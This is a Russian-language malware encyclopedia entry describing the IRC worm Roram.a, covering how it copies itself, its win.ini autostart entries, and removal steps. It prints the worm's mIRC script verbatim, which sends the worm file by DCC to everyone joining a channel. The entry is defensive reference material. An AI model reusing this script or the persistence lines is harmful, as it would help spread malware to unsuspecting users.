IRC-Worm.Win32.Roram.a
Материал из Total Malware Info
IRC-Worm.Win32.Roram.a Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 4 096 байт.
Инсталляция
Копирует свой исполняемый файл как:
C:\Windows\Reiop.exe
Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в файл настроек Windows: c:\windows\win.ini:
[windows] load=C:\Windows\Reiop.exe run=C:\Windows\Reiop.exe
Деструктивная активность
Записывает в файл скриптов программы mIRC - C:\Programme\mIRC\script.ini следующие строки:
[script]
n0=on 1:join:*.*:
n1={ if ( $nick==$me) {halt}
n2=/dcc send $nick C:\Windows\Reiop.exe
n3=}
Данный скрипт расссылает исполняемый файл червя по сервису DCC всем присоединяющимся к каналу клиентам.
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- При помощи ("Диспетчера задач") завершить процесс червя.
- Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить следующие строки из файла c:\windows\win.ini:
- Удалить следующие строки из файла:
- Удалить файл:
load=C:\Windows\Reiop.exe run=C:\Windows\Reiop.exe
n0=on 1:join:*.*:
n1={ if ( $nick==$me) {halt}
n2=/dcc send $nick C:\Windows\Reiop.exe
n3=}
C:\Windows\Reiop.exe






